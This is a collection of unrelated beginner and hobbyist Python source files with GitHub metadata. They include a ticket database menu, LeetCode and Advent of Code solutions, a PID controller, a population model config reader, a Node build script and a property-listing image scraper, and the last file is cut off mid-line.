import sqlite3 conn = sqlite3.connect("tickets5.db") cur = conn.cursor() def displayAllTickets(): sql = "SELECT * FROM tickets" cur.execute(sql) results = cur.fetchall() if results: printStuff(results) else: print("No data found") print() def addTicket(): actual_speed = int(input("Enter actual speed: ")) posted_speed = int(input("Enter posted speed: ")) age = int(input("Enter age of offender: ")) violator_sex = str(input("Enter sex of offender: ")) data = (None, actual_speed, posted_speed, age, violator_sex) sql = "INSERT INTO tickets VALUES (?, ?, ?, ?, ?)" cur.execute(sql, data) conn.commit() def displayTicketsByOffender(): violator_sex = input("Enter sex of offender: ") data = (violator_sex, ) sql = "SELECT * FROM tickets WHERE violator_sex = ?" cur.execute(sql, data) results = cur.fetchall() if results: printStuff(results) else: print("Name not found") print() def printStuff(data): print("%-10s %-12s %-10s %-5s %-12s " % ("ticketID", "Posted MPH", "MPH Over", "Age", "Violator Sex")) for row in data: over = row[1] - row[2] print(" %-10d %-12d %-10d %-5d %-12s " % (row[0], row[1], over, row[3], row[4])) print() def main(): while True: print(""" Menu options. Choose 1, 2, 3, or 4: 1. Display all Tickets 2. Add a Ticket 3. Filter by Offender Sex 4. Save & Exit """) opt = input("Enter your choice, 1, 2, 3, or 4: ") if opt == "1": displayAllTickets() elif opt == "2": addTicket() elif opt == "3": displayTicketsByOffender() elif opt == "4": print() print("Goodbye") if conn: conn.close break else: print("Invalid entry, please re-enter your choice") print() main()
LilGotit/brain-drizzle
TicketsDatabase/ticketDatabase.py
ticketDatabase.py
py
2,130
python
en
code
0
github-code
6
43627424884
from typing import List class Solution: def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int: employees = {} for i, m in enumerate(manager): if i != headID: employees[m] = employees.get(m, []) + [i] queue = [[headID, informTime[headID]]] res = 0 while queue: node, time = queue.pop(0) for empl in employees.get(node, []): empl_time = time+informTime[empl] res = max(res, empl_time) queue.append([empl, empl_time]) return res def test(self): test_cases = [ [1, 0, [-1], [0]], [6, 2, [2, 2, -1, 2, 2, 2], [0, 0, 1, 0, 0, 0]], [7, 6, [1,2,3,4,5,6,-1], [0,6,5,4,3,2,1]], [4, 2, [3,3,-1,2], [0,0,162,914]], [15, 0, [-1,0,0,1,1,2,2,3,3,4,4,5,5,6,6], [1,1,1,1,1,1,1,0,0,0,0,0,0,0,0]], [11, 4, [5,9,6,10,-1,8,9,1,9,3,4], [0,213,0,253,686,170,975,0,261,309,337]], ] for n, headID, manager, informTime in test_cases: res = self.numOfMinutes(n, headID, manager, informTime) print('res: %s' % res) print('-='*30 + '-') if __name__ == '__main__': Solution().test()
MichaelTQ/LeetcodePythonProject
solutions/leetcode_1351_1400/LeetCode1376_TimeNeededToInformAllEmployees.py
LeetCode1376_TimeNeededToInformAllEmployees.py
py
1,290
python
en
code
0
github-code
6
42535314476
# OKANCAN COSAR # 12253018 import Helper import Constant import Step import sys populasyon = [] def Calculate(populasyonlar): # for i in Helper.populasyonDict(populasyonlar): # # guzel yazdirma # ff = "" # for ix in i[0]: # ff = ff + str(ix) # print("(", ff, "),", i[1]) # # guzel yazdirma sonu # Ebeveynleri sec (PARENT SELECT) parents = Step.parentSelect(populasyonlar) # Ebeveynleri caprazla (RECOMBINE) ve yavrulari mutasyona tabi tut (MUTATE) # (Offsprings(Cocuklar)) cocuklar = Step.recombineAndMutate(parents) # Degerlerini hesaplayip dictionary yapar. # sort'laryip ilk 50 yi dondurur populasyonlarx = Step.survivalSelect(cocuklar + populasyonlar) return populasyonlarx def main(): global populasyon # Bitis kosulu saglanana kadar TEKRARLA(REPEAT) for iterasyon in range(Constant.ITERASYONSAYISI): # print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Generation: " + str(iterasyon) + " <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<") if iterasyon == 0: # Baslangic populasyonunu rastgele olustur (INITIALISE) populasyon = Step.Initialise() populasyon = Calculate(populasyon) # elif iterasyon == Constant.ITERASYONSAYISI-1: # print("\n\nFinal Population:") # # guzel yazdirma # ff = "" # for ix in Helper.populasyonDict(populasyon): # ff = ff + str(ix) + "\n" # print(ff) # # guzel yazdirma sonu else: populasyon = Calculate(populasyon) from datetime import datetime if __name__ == '__main__': # f = open("out.txt", "w") # sys.stdout = f a = datetime.now().microsecond * 0.001 main() b = datetime.now().microsecond * 0.001 print(b - a)
OkancanCosar/01-Knapsack-with-GA
python/index.py
index.py
py
1,827
python
tr
code
2
github-code
6
69817132988
#!/usr/bin/env python3 class PIDController: """ """ def __init__(self, kp, ki, kd, dt): self.__kp = kp # Proportional weight. self.__ki = ki # Integral weight. self.__kd = kd # Differential weight. self.__dt = dt # Time interval. self.__error_prev = None # Previous calculated error. self.__error_integrate = 0 # Controller error. self.output_list = [0, 0, 0] # Controller output list. self.output_sum = 0 # Controller output value. """ @fn step @brief """ def step(self, err): # Calculate the errors of the controller. error = err self.__error_integrate += error if self.__error_prev is None: error_differential = 0.0 else: error_differential = (error - self.__error_prev) / self.__dt self.__error_prev = error # Controller components. proportional = self.__kp * error integral = self.__ki * self.__error_integrate differential = self.__kd * error_differential # Assign and calculate outputs for the controller. self.output_list = [proportional, integral, differential] self.output_sum = sum(self.output_list)
derekdecost/Differential-Drive-Robot
packages/pid_controller/src/pid_controller.py
pid_controller.py
py
1,392
python
en
code
0
github-code
6
26531291291
from pyhpecfm import system from lib.actions import HpecfmBaseAction class eventLookup(HpecfmBaseAction): def run(self): cfm_audits = system.get_audit_logs(self.client) if isinstance(cfm_audits, list): # Create a empty list for alarms event_data = [] # Loop through cfm_audits and process EVENTS for event in cfm_audits: typex = event['record_type'] if typex == 'EVENT': # Build dictionary to add to list out = { 'u_eventType': event['data']['event_type'], 'u_typex': event['record_type'], 'u_sev': event['severity'], 'u_uuid': event['uuid'], 'u_desc': event['description'], 'u_name' : event['data']['object_name'], 'u_typeo' : event['data']['object_type'] } event_data.append(out) return (True, event_data) return (False, cfm_audits)
HewlettPackard/stackstorm-hpe-cfm
actions/get_events.py
get_events.py
py
1,125
python
en
code
1
github-code
6
10251411217
""" Configuration reader for the population_gravity model @author Chris R. Vernon @email: [email protected] License: BSD 2-Clause, see LICENSE and DISCLAIMER files """ import datetime import os import simplejson import rasterio import yaml import pandas as pd import population_gravity.downscale_utilities as utils class ReadConfig: """Read configuration data either provided in the configuration YAML file or as passed in via arguments. :param config_file: string. Full path to configuration YAML file with file name and extension. If not provided by the user, the code will default to the expectation of alternate arguments. :param grid_coordinates_file: string. Full path with file name and extension to the CSV file containing the coordinates for each 1 km grid cell within the target state. File includes a header with the fields XCoord, YCoord, FID. Where data types and field descriptions are as follows: (XCoord, float, X coordinate in meters), (YCoord, float, Y coordinate in meters), (FID, int, Unique feature id) :param historical_suitability_raster: string. Full path with file name and extension to the suitability raster containing values from 0.0 to 1.0 for each 1 km grid cell representing suitability depending on topographic and land use and land cover characteristics within the target state. :param base_rural_pop_raster: string. Full path with file name and extension to a raster containing rural population counts for each 1 km grid cell for the historical base time step. :param base_urban_pop_raster: string. Full path with file name and extension to a raster containing urban population counts for each 1 km grid cell for the historical base time step. :param projected_population_file: string. Full path with file name and extension to a CSV file containing population projections per year separated into urban and rural categories. Field descriptions for require fields as follows: (Year, integer, four digit year), (UrbanPop, float, population count for urban), (RuralPop, float, population count for rural), (Scenario, string, scenario as set in the `scenario` variable) :param one_dimension_indices_file: string. Full path with file name and extension to the text file containing a file structured as a Python list (e.g. [0, 1]) that contains the index of each grid cell when flattened from a 2D array to a 1D array for the target state. :param output_directory: string. Full path with file name and extension to the output directory where outputs and the log file will be written. :param alpha_urban: float. Alpha parameter for urban. Represents the degree to which the population size of surrounding cells translates into the suitability of a focal cell. A positive value indicates that the larger the population that is located within the 100 km neighborhood, the more suitable the focal cell is. More negative value implies less suitable. Acceptable range: -2.0 to 2.0 :param beta_urban: float. Beta parameter for urban. Reflects the significance of distance to surrounding cells on the suitability of a focal cell. Within 100 km, beta determines how distance modifies the effect on suitability. Acceptable range: -0.5 to 2.0 :param alpha_rural: float. Alpha parameter for rural. Represents the degree to which the population size of surrounding cells translates into the suitability of a focal cell. A positive value indicates that the larger the population that is located within the 100 km neighborhood, the more suitable the focal cell is. More negative value implies less suitable. Acceptable range: -2.0 to 2.0 :param beta_rural: float. Beta parameter for rural. Reflects the significance of distance to surrounding cells on the suitability of a focal cell. Within 100 km, beta determines how distance modifies the effect on suitability. Acceptable range: -0.5 to 2.0 :param scenario: string. String representing the scenario with no spaces. Must match what is in the `projected_population_file` if passing population projections in using a file. :param state_name: string. Target state name with no spaces separated by an underscore. :param historic_base_year: int. Four digit historic base year. :param projection_year: int. Four digit first year to process for the projection. :param projection_end_year: int. Four digit last year to process for the projection. :param time_step: int. Number of steps (e.g. number of years between projections) :param rural_pop_proj_n: float. Rural population projection count for the projected year being calculated. These can be read from the `projected_population_file` instead. :param urban_pop_proj_n: float. Urban population projection count for the projected year being calculated. These can be read from the `projected_population_file` instead. :param calibration_urban_year_one_raster: string. Only used for running calibration. Full path with file name and extension to a raster containing urban population counts for each 1 km grid cell for year one of the calibration. :param calibration_urban_year_two_raster: string. Only used for running calibration. Full path with file name and extension to a raster containing urban population counts for each 1 km grid cell for year two of the calibration. :param calibration_rural_year_one_raster: string. Only used for running calibration. Full path with file name and extension to a raster containing rural population counts for each 1 km grid cell for year one of the calibration. :param calibration_rural_year_two_raster: string. Only used for running calibration. Full path with file name and extension to a raster containing rural population counts for each 1 km grid cell for year two of the calibration. :param kernel_distance_meters: float. Distance kernel in meters; default 100,000 meters. :param write_raster: boolean. Optionally export raster output; Default True :param write_csv: boolean. Optionally export raster as a CSV file without nodata values :param write_array2d: boolean. Optionally export a NumPy 2D array for each output in the shape of the template raster :param write_array1d: boolean. Optionally export a Numpy 1D flattened array of only grid cells within the target state :param run_number: int. Add on for the file name when running sensitivity analysis :param write_logfile: boolean. Optionally write log to file.; Default True :param compress_csv: boolean. Optionally compress CSV file to GZIP if outputting in CSV :param output_total: boolean. Choice to output total (urban + rural) dataset; Defualt True """ # format for datetime string DATETIME_FORMAT = '%Y-%m-%d_%Hh%Mm%Ss' # key names from YAML config file OUT_DIR_KEY = 'output_directory' START_STEP_KEY = 'start_step' THROUGH_STEP_KEY = 'through_step' ALPHA_KEY = 'alpha_param' BETA_KEY = 'beta_param' # definition of acceptable range of values for parameters MAX_PARAM_VALUE = 10.0 MIN_PARAM_VALUE = -10.0 def __init__(self, config_file=None, grid_coordinates_file=None, historical_suitability_raster=None, base_rural_pop_raster=None, base_urban_pop_raster=None, projected_population_file=None, one_dimension_indices_file=None, output_directory=None, alpha_urban=None, beta_urban=None, alpha_rural=None, beta_rural=None, scenario=None, state_name=None, historic_base_year=None, projection_year=None, rural_pop_proj_n=None, urban_pop_proj_n=None, calibration_urban_year_one_raster=None, calibration_urban_year_two_raster=None, calibration_rural_year_one_raster=None, calibration_rural_year_two_raster=None, kernel_distance_meters=None, write_raster=True, write_csv=False, write_array1d=False, write_array2d=False, run_number='', write_logfile=True, compress_csv=True, output_total=True, write_suitability=False, pass_one_alpha_upper=1.0, pass_one_alpha_lower=-1.0, pass_one_beta_upper=1.0, pass_one_beta_lower=0.0, pass_two_alpha_upper=2.0, pass_two_alpha_lower=-2.0, pass_two_beta_upper=2.0, pass_two_beta_lower=-0.5, brute_n_alphas=10, brute_n_betas=5): self._config_file = config_file self._alpha_urban = alpha_urban self._alpha_rural = alpha_rural self._beta_urban = beta_urban self._beta_rural = beta_rural self._kernel_distance_meters = kernel_distance_meters self._output_directory = output_directory self.grid_coordinates_file = self.validate_file(grid_coordinates_file) self.grid_coordinates_array = self.get_grid_coordinates_array() # Full path with file name and extension to the suitability raster containing values from 0.0 to 1.0 # for each 1 km grid cell representing suitability depending on topographic and land use and land cover # characteristics within the target state. self.historical_suitability_raster = self.validate_file(historical_suitability_raster) self.base_rural_pop_raster = self.validate_file(base_rural_pop_raster) self.base_urban_pop_raster = self.validate_file(base_urban_pop_raster) self._projected_population_file = projected_population_file self._one_dimension_indices_file = one_dimension_indices_file # Target scenario name self.scenario = scenario.lower() # Target state name self.state_name = state_name.lower() # Four digit historic base year self.historic_base_year = self.validate_step(historic_base_year, 'historic_base_year') # Four digit first year to process for the projection self.projection_year = self.validate_step(projection_year, 'projection_year') self._rural_pop_proj_n = rural_pop_proj_n self._urban_pop_proj_n = urban_pop_proj_n # Optionally save outputs to a raster self.write_raster = write_raster # Optionally export raster as a CSV file without nodata values; option set to compress CSV using gzip. # Exports values for non-NODATA grid cells as field name `value` self.write_csv = write_csv # Optionally save outputs to a 1D array for cells within the target state self.write_array1d = write_array1d # Optionally save outputs to a 1D array for cells within the target state self.write_array2d = write_array2d # An integer add on for the file name when running sensitivity analysis self.run_number = run_number # Optionally write log outputs to a file self.write_logfile = write_logfile # Compress CSV to GZIP option self.compress_csv = compress_csv # Choice to output total dataset (urban + rural) self.output_total = output_total self.write_suitability = write_suitability # specific to calibration run self.calibration_urban_year_one_raster = calibration_urban_year_one_raster self.calibration_urban_year_two_raster = calibration_urban_year_two_raster self.calibration_rural_year_one_raster = calibration_rural_year_one_raster self.calibration_rural_year_two_raster = calibration_rural_year_two_raster self.pass_one_alpha_upper = pass_one_alpha_upper self.pass_one_alpha_lower = pass_one_alpha_lower self.pass_one_beta_upper = pass_one_beta_upper self.pass_one_beta_lower = pass_one_beta_lower self.pass_two_alpha_upper = pass_two_alpha_upper self.pass_two_alpha_lower = pass_two_alpha_lower self.pass_two_beta_upper = pass_two_beta_upper self.pass_two_beta_lower = pass_two_beta_lower self.brute_n_alphas = brute_n_alphas self.brute_n_betas = brute_n_betas # get a copy of the raster metadata from a states input raster self.template_raster_object, self.metadata = utils.get_raster_with_metadata(self.historical_suitability_raster) # import population projection file if exists self.df_projected = self.process_df_projected() # Get a bounding box from the historical raster self.bbox = utils.create_bbox(self.template_raster_object) # Get a current time in a string matching the specified datetime format self.date_time_string = datetime.datetime.now().strftime(self.DATETIME_FORMAT) # Convenience wrapper for the DATETIME_FORMAT class attribute self.datetime_format = self.DATETIME_FORMAT # Validate output directory self.output_directory = self.set_output_directory() # Full path with file name and extension to the logfile self.logfile = os.path.join(self.output_directory, f'logfile_{self.scenario}_{self.state_name}_{self.date_time_string}.log') @property def alpha_urban(self): """Alpha urban parameter for model.""" return self.validate_parameter(self._alpha_urban, 'alpha_urban') @alpha_urban.setter def alpha_urban(self, value): """Setter for alpha urban parameter.""" self._alpha_urban = self.validate_parameter(value, 'alpha_urban') @property def alpha_rural(self): """Alpha rural parameter for model.""" return self.validate_parameter(self._alpha_rural, 'alpha_rural') @alpha_rural.setter def alpha_rural(self, value): """Setter for alpha rural parameter.""" self._alpha_rural = self.validate_parameter(value, 'alpha_rural') @property def beta_urban(self): """Beta urban parameter for model.""" return self.validate_parameter(self._beta_urban, 'beta_urban') @beta_urban.setter def beta_urban(self, value): """Setter for beta urban parameter.""" self._beta_urban = self.validate_parameter(value, 'beta_urban') @property def beta_rural(self): """Beta rural parameter for model.""" return self.validate_parameter(self._beta_rural, 'beta_rural') @beta_rural.setter def beta_rural(self, value): """Setter for beta rural parameter.""" self._beta_rural = self.validate_parameter(value, 'beta_rural') @property def kernel_distance_meters(self): """Distance kernel in meters; default 100,000 meters.""" return self.validate_float(self._kernel_distance_meters) @kernel_distance_meters.setter def kernel_distance_meters(self, value): """Setter for kernel_distance_meters.""" self._kernel_distance_meters = value def process_df_projected(self): """From population projection file if exists.""" if (self.urban_pop_proj_n is None) and (self.rural_pop_proj_n is None): df = pd.read_csv(self.projected_population_file) # make header lower case df.columns = [i.lower() for i in df.columns] # make scenario column lower case df['scenario'] = df['scenario'].str.lower() return df else: return None def set_output_directory(self): """Validate output directory.""" if self.config is None: return self.validate_directory(self._output_directory) else: key = self.validate_key(self.config, self.OUT_DIR_KEY) return self.validate_directory(key) @property def historical_suitability_2darray(self): """Read in historical suitability mask as an array""" return utils.raster_to_array(self.historical_suitability_raster) @property def historical_suitability_array(self): """Flatten historical suitability array.""" return self.historical_suitability_2darray.flatten() @property def df_indicies(self): """Build data frame in the shape of the raster array.""" return utils.all_index_retriever(self.historical_suitability_2darray, ["row", "column"]) @property def one_dimension_indices_file(self): """File that describe grid indices of points that fall within the state boundary.""" return self.validate_file(self._one_dimension_indices_file) @property def one_dimension_indices(self): """Grid indices for the state to an array.""" with open(self.one_dimension_indices_file, 'r') as r: return simplejson.load(r) def get_grid_coordinates_array(self): """Grid coordinates to array.""" # return np.genfromtxt(self.grid_coordinates_file, delimiter=',', skip_header=1, usecols=(0, 1, 2), dtype=float) df = pd.read_csv(self.grid_coordinates_file) df.sort_values('FID', inplace=True) df.set_index('FID', drop=False, inplace=True) df.index.name = None df = df[['XCoord', 'YCoord', 'FID']].copy() return df.values @property def urban_pop_proj_n(self): """Urban population projection count for the projected year being calculated. These can be read from the `projected_population_file` instead. """ return self.validate_float(self._urban_pop_proj_n) @property def rural_pop_proj_n(self): """Rural population projection count for the projected year being calculated. These can be read from the `projected_population_file` instead. """ return self.validate_float(self._rural_pop_proj_n) @property def projected_population_file(self): """Full path with file name and extension to a CSV file containing population projections per year separated into urban and rural categories. """ return self.validate_file(self._projected_population_file) @property def config(self): """Read the YAML config file object""" if self._config_file is None: return None else: with open(self._config_file, 'r') as yml: return yaml.load(yml) @property def template_raster(self): """Generate template raster specifications. :return: [0] 2D array of template raster values [1] 1D flattened array [2] row count [3] column count [4] profile """ with rasterio.open(self.historical_suitability_raster) as src_raster: profile = src_raster.profile array2d = src_raster.read(1) row_count = array2d.shape[0] col_count = array2d.shape[1] array1d = array2d.flatten() return array2d, array1d, row_count, col_count, profile def validate_parameter(self, param, key): """Validate parameter existence and range. :param param: Parameter value :type param: float :param key: Configuration key from YAML file :type key: str :return: int; parameter """ if self.config is None: is_float = self.validate_float(param) return self.validate_range(is_float) else: is_key = self.validate_key(self.config, key) is_float = self.validate_float(is_key) return self.validate_range(is_float) def validate_range(self, value): """Ensure value falls within an acceptable range.""" if (value >= self.MIN_PARAM_VALUE) and (value <= self.MAX_PARAM_VALUE): return value else: raise ValueError(f"Parameter value '{value}' is not within the valid range of {self.MIN_PARAM_VALUE} - {self.MAX_PARAM_VALUE}.") @staticmethod def validate_float(val): """Ensure parameter value is type float""" if val is not None: try: return float(val) except TypeError: raise TypeError(f"Parameter value '{val}' is not a float.") else: return None @staticmethod def validate_directory(directory): """Validate directory to ensure it exists. :param directory: Full path to the target directory. :type directory: str :return: Full path of a valid directory """ if (directory is not None) and (os.path.isdir(directory)): return directory elif (directory is not None) and (os.path.isdir(directory is False)): raise NotADirectoryError(f"Directory: {directory} does not exist.") else: return None @staticmethod def validate_file(file): """Validate file to ensure it exists. :param file: Full path to the target file. :type file: str :return: Full path of a valid file """ if (file is not None) and (os.path.isfile(file)): return file elif (file is not None) and (os.path.isfile(file) is False): raise FileNotFoundError(f"File: {file} does not exist.") else: return None def validate_step(self, step, key): """Validate step existence and value. :param step: Time step value :type step: int :param key: Configuration key from YAML file :type key: str :return: int; time step """ if self.config is None: return self.validate_int(step) else: is_key = self.validate_key(self.config, key) return self.validate_int(is_key) @staticmethod def validate_int(n): """Ensure time step is type int""" if n is not None: try: return int(n) except TypeError: raise TypeError(f"Value '{n}' is not an integer.") else: return None @staticmethod def validate_key(yaml_object, key): """Check to see if key is in YAML file, if not return None. :param yaml_object: YAML object for the configuration file :param key: Target key name from the configuration file. :type key: str :return: Value from configuration file matching the key. If no key present, return None. """ try: return yaml_object[key] except KeyError: return None @staticmethod def get_yaml(config_file): """Read the YAML config file :param config_file: Full path with file name and extension to the input config.yml file :return: YAML config object """ with open(config_file, 'r') as yml: return yaml.load(yml)
IMMM-SFA/population_gravity
population_gravity/read_config.py
read_config.py
py
26,485
python
en
code
4
github-code
6
7206670163
assert __name__ == "__main__" import sys import os import subprocess import shutil from . import config os.chdir('node-{}'.format(config.nodeVersion)) configureArgvs = config.configFlags if config.nodeTargetConfig == 'Debug': configureArgvs = configureArgvs + ['--debug-nghttp2', '--debug-lib'] if sys.platform == 'win32': env = os.environ.copy() env['config_flags'] = ' '.join(configureArgvs) if config.nodeTargetConfig == 'Release': print("==============BUILDING RELEASE LIBRARIES=================") subprocess.check_call( ['cmd', '/c', 'vcbuild.bat', 'release', 'x86', 'small-icu'], env=env ) elif config.nodeTargetConfig == 'Debug': print("==============BUILDING DEBUG LIBRARIES=================") subprocess.check_call( ['cmd', '/c', 'vcbuild.bat', 'debug', 'debug-nghttp2', 'x86', 'small-icu'], env=env ) else: print("======UNKNOWN=======") else: # Build as release if config.nodeTargetConfig == 'Release': print("==============BUILDING RELEASE LIBRARIES=================") subprocess.check_call([ sys.executable, 'configure.py', '--ninja' ] + configureArgvs) subprocess.check_call(['ninja', '-C', 'out/Release']) elif config.nodeTargetConfig == 'Debug': # Build as debug print("==============BUILDING DEBUG LIBRARIES=================") subprocess.check_call([ sys.executable, 'configure.py', '--ninja', '--debug' ] + configureArgvs) subprocess.check_call(['ninja', '-C', 'out/Debug']) else: print("==========UNKNOWN=========")
MafiaHub/building-node
scripts/build.py
build.py
py
1,694
python
en
code
0
github-code
6
26302348125
import frappe, requests from frappe.model.document import Document class DjangoProperty(Document): def db_insert(self): d = self.get_valid_dict(convert_dates_to_str=True) res = requests.post(f'{self.get_url()}/propertycreate/', data=dict(d)) return res.json() def load_from_db(self): print(self.doctype, self.name, 'demonstration\n\n\n') if(self.name!=self.doctype): res = requests.get(f'{self.get_url()}/propertydetail/{self.name}/') if(res.status_code==200): for key, value in res.json()[0].items(): setattr(self, key, value) def db_update(self): d = self.get_valid_dict(convert_dates_to_str=True) # print(type(d), type(dict(d)), '\n\n\n') res = requests.post(f'{self.get_url()}/propertycreate/', data=dict(d)) return res.json() def get_list(self, args): # print(args, 'ARGS, \n\n\n') url = f"{self.get_url()}/propertylist/" res = requests.get(url) if(res.status_code==200): return res.json() return json.dumps([]) def get_url(self): return "http://192.168.1.156:8000/property"
mymi14s/estate_app
estate_app/estate_app/doctype/djangoproperty/djangoproperty.py
djangoproperty.py
py
1,046
python
en
code
16
github-code
6
30906490211
import requests, re def scrape_images(link): # define our user headers headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" } gallery_append = 'media?id=media0&ref=photoCollage&channel=RES_BUY' link_replace = '?channel=RES_BUY' regex_pattern = r'((?:https:)(?:[/|.|\w|\s|-])*(?:IMG_\d{2}_\d{4})\.(?:jpg|gif|png|jpeg))' gallery_link = link.replace(link_replace, gallery_append) res = requests.get(gallery_link, headers=headers) res.raise_for_status() matches = re.findall(regex_pattern, res.text) matches_clean = list(dict.fromkeys(matches)) return matches_clean
GregorMonsonFD/holmly_sourcing_legacy
scripts/python/pdfGen/rightmove_image_extract.py
rightmove_image_extract.py
py
717
python
en
code
0
github-code
6
70829089789
import logging.config DEFAULT_LEVEL = logging.WARNING DEFAULT_FMT = '%(asctime)s | %(levelname)-8s | %(message)s' def install(level=DEFAULT_LEVEL, fmt=DEFAULT_FMT): logging.basicConfig(level=level, format=fmt) try: import sys import colorlog formatter = colorlog.ColoredFormatter( fmt='%(log_color)s' + fmt + '%(reset)s', log_colors={ 'DEBUG': 'blue', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'white,bg_red', } ) handler = colorlog.StreamHandler(sys.stdout) handler.setFormatter(formatter) logging.root.handlers.clear() logging.root.addHandler(handler) except: pass
Arcensoth/pymcutil
pymcutil/logging/__init__.py
__init__.py
py
799
python
en
code
3
github-code
6
27392276941
connections = {} with open("Day12.txt", 'r') as INPUT: data = INPUT.read().split("\n") for i in data: caves = i.split("-") if caves[1] != "start": if caves[0] in connections: connections[caves[0]].append(caves[1]) else: connections[caves[0]] = [caves[1]] if caves[0] != "start": if caves[1] in connections: connections[caves[1]].append(caves[0]) else: connections[caves[1]] = [caves[0]] def get_paths(): paths = [] check = [["start"]] while True: new_check = [] if len(check) == 0: break for i in check: if i[-1] not in connections: continue if i[-1] == "end": paths.append(i) continue n = set(connections[i[-1]]) - set(j for j in i if j.islower()) for j in n: new_check.append(i + [j]) check = new_check return paths print("part 1:", len(get_paths())) def get_paths2(): paths = [] check = [["start"]] while len(check): new_check = [] for i in check: if i[-1] not in connections: continue if i[-1] == "end": paths.append(i) continue a = [s for s in i if s.islower()] dupe = len(a) > len(set(a)) for j in connections[i[-1]]: if j.islower() and j in i: if not dupe: new_check.append(i + [j]) else: new_check.append(i + [j]) check = new_check return paths print("part 2:", len(get_paths2()))
stepheneldridge/Advent-of-Code-2021
Day12.py
Day12.py
py
1,813
python
en
code
0
github-code
6
70143221629
# First sight solution # PART ONE class Solution: def findRequirementsForMass(self, the_mass): module_mass = int(the_mass) dividedByThree = module_mass / 3 rounded_minus_two = int(dividedByThree) - 2 return rounded_minus_two def findSolution(self, inputfile): total_fuel_requirements = 0 for line in open(inputfile): total_fuel_requirements = total_fuel_requirements + Solution().findRequirementsForMass(line.strip()) return int(total_fuel_requirements) print("Day One Part One Solution: %d" % (Solution().findSolution('input.txt'))) # PART TWO # My initial thoughts on this were that it sounded recursive, so thought this was the first # approach. Took me longer to try it that way than I thought so I went with something more basic. class SolutionPartTwo: def findRequirementsForMass(self, the_mass): module_mass = int(the_mass) dividedByThree = module_mass / 3 rounded_minus_two = int(dividedByThree) - 2 return rounded_minus_two def findSolution(self, inputfile): total_fuel_requirements = 0 remaining = 0 for line in open(inputfile): remaining = Solution().findRequirementsForMass(line.strip()) while remaining > 0: # This bit kinda stands in for recursive calls to a function total_fuel_requirements = total_fuel_requirements + remaining remaining = Solution().findRequirementsForMass(remaining) return int(total_fuel_requirements) print("Day One Part Two Solution: %d" % (SolutionPartTwo().findSolution('input.txt')))
StephenClarkApps/AdventOfCode2019
DayOne/DayOne.py
DayOne.py
py
1,637
python
en
code
0
github-code
6
2231582526
def state_machine(demanded_state): switcher = { 0: menu, 1: cycling, 2: settings, 3: exit } func = switcher.get(demanded_state, "Not found!") return func() def allowed_transition(demanded_state, allowed_states = []): for i in allowed_states: if(demanded_state == allowed_states[i]): return 1 return 0 #std_ret == 0 def menu(): print("\n>>> MAIN MENU <<<") print("1. cycling") print("2. settings") print("3. exit") std_ret = 0 try: std_ret = int(input("Transition: ")) except: std_ret = 0 return std_ret #std_ret == 1 def cycling(): print("\n>>> CYCLING <<<") print(" __ ") print(" __\ \ ") print(" (___)) ) ") print(" /_/ ") try: std_ret = int(input("Transition: ")) except: std_ret = 0 return std_ret #std_ret == 10 def cycling_start(): print("\n>>> CYCLING <<<") print(" Speed: ") print("Distance: ") print("Altitude: ") print(" Time: ") try: std_ret = int(input("Transition: ")) if(allowed_transition(std_ret, arr = (1, 10, 11) != 1)): std_ret = 1 except: std_ret = 10 return std_ret #std_ret == 11 def cycling_pause(): print("\n>>> CYCLING <<<") print(" __ __ ") print(" | | | | ") print(" | | | | ") print(" |__| |__| ") try: std_ret = int(input("Transition: ")) except: std_ret = 0 return std_ret #std_ret == 2 def settings(): print("\n>>> SETTINGS <<<") try: std_ret = int(input("Transition: ")) except: std_ret = 0 return std_ret #std_ret == 3 def exit(): print("\n>>> EXIT <<<") print("------- pi-gps 2019 -------") sys.exit() def init(): try: #serial setup ser = serial.Serial(port="/dev/ttyS0", baudrate=9600, timeout=0.5) #create file filename = str(datetime.datetime.now().isoformat()) + '.gpx' #xml data xml_version = "1.0" encoding = "UTF-8" standalone="yes" #gpx data gpx_version="1.1" creator="pi-gps 2019" xsi_schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd" xmlns="http://www.topografix.com/GPX/1/1" xmlns_gpxtpx="http://www.garmin.com/xmlschemas/TrackPointExtension/v1" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance" #metadata name="pi-gps" activity = "Cycling" #return std_ret = 1 except: std_ret = 0 return std_ret #start from main menu number_of_active_state = 0 print("------- pi-gps 2019 -------") while True: std_ret = state_machine(std_ret)
frigodaw/pi-gps
python/stubs.py
stubs.py
py
3,026
python
en
code
1
github-code
6
73185311228
nums = [0,0,1,1,1,2,2,3,3,4] count = 1 for i in range(1, len(nums)): if (nums[i] != nums[i - 1]): nums[count] = nums[i] count = count + 1 print(count) for i in range(count, len(nums)): nums.remove(nums[count ]) print(nums)
xuchenxing/MyLeetcode
junior/DeleteRepeatFromSortedList.py
DeleteRepeatFromSortedList.py
py
249
python
en
code
0
github-code
6
26417087384
# Nesting - Store a set of dictionaries in a list or a list of # items as a value in a dictionary. A power feature ! # An empty list for storing aliens # At range() returns a set of numbers that teills Python how many # times we want the lop to repeat. Each time the loop runs we # create a new alien # Append each new alien to the list aliens aliens = [] # 30 green aliens for alien_no in range(30): new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'} aliens.append(new_alien) # Show first 5 aliens for alien in aliens[:5]: print(alien) print("...") # Show how many aliens created print("Total no of aliens: " + str(len(aliens))) # code 2 # use for loop and if statement to change color, etc # Modify first 3 aliens only # If statement to ensure that we're onlly modifying green aliens aliens = [] for alien_no in range(0,30): new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'} aliens.append(new_alien) for alien in aliens [0:3]: if alien['color'] == 'green': alien['color'] = 'yellow' alien['speed'] = 'medium' alien['points'] = 10 # show first five aliens for alien in aliens[0:5]: print(alien) print("...") # List in Dict # Begin with a dict that holds info about pizza ordered # One key in the dict is 'crust' and the associated value is # 'thick' # Next key 'toppings' with its values # Summarize order # To print the toppings, we write a for loop # To access the list of toppings , use the key 'toppings' # Python grabs the list of toppongs from the dict # Info about ordered pizza pizza = { 'crust': 'thick', 'toppings': ['mushrooms', 'cheese'], } # Summarize print("Ordered a " + pizza['crust'] + "- crust 